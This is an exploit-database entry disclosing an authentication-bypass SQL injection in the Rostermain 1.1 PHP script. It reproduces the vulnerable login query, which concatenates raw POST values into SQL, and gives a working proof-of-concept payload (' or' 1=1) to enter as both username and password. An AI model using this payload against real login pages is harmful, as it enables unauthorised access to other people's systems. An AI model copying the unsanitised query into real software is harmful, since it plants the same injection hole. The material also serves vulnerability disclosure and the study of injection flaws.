id: 10790
date: 02/07/2010
title: Rostermain <= 1.1 (Auth Bypass) SQL Injection Vulnerability
author: cr4wl3r
cves: 

===========================================================
Rostermain <= 1.1 (Auth Bypass) SQL Injection Vulnerability
===========================================================

[+] Rostermain <= 1.1 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r 
[+] Download : http://scripts.ringsworld.com/games-and-entertainment/rostermain/
 
 
[+] Vuln Code :
 
[index.php]
 
if ($_POST['userid'] && $_POST['password'])
{
  // if the user has just tried to log in
  $logquery = "select * from users "
           ."where username='$userid' "
           ." and passwd='$password' ";
 
[+] PoC :
 
username :  ' or' 1=1
password :  ' or' 1=1



#  0day.today [2023-03-23]  #